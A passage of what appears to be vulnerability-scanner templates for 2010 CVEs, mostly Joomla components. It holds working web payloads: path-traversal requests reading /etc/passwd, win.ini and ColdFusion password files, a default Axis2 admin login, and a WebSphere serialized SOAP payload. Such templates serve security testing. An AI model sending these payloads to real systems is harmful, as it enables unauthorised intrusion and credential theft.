xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File 